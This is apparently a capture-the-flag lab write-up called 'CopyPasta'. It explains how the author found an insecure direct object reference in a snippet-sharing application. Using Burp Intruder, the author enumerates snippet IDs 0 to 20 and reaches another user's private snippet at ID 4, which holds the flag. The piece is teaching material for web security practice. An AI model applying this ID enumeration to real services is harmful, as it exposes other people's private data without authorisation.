CopyPasta

Today the lab starts with the hint IDOR. This means that today we're going to hunt down some predictable IDs. These IDs can be alphanumerical. My main strategy today will be to click around the application, and let Burp capture the traffic. It's important to try and hit every visible endpoint. Once I clicked all my worries away, I'll open up Burp and check the traffic.

After registering my usual shadow:shadowforge, some happy clicking, writing and posting in the application. I inspected the traffic. I already saw during my interaction in the application that there was a numerical ID showing up in the URL when I was creating a snippet. So my instinct kicked in and looked after that particular request in Burp.

This request seemed a fine candidate to send to Intruder. I set up my payload to be numerical values between 0 and 20 and let Intruder do his thing. I was getting some 200s, but ID 2 and 3 where public snippets. This was because the property "is_public":1 but on ID 4 I saw the opposite. This was a private snippet, and I wasn't the author of it.

The flag and message property contained the flag 🇧🇪

Another way is just going to id 4 inside the URL.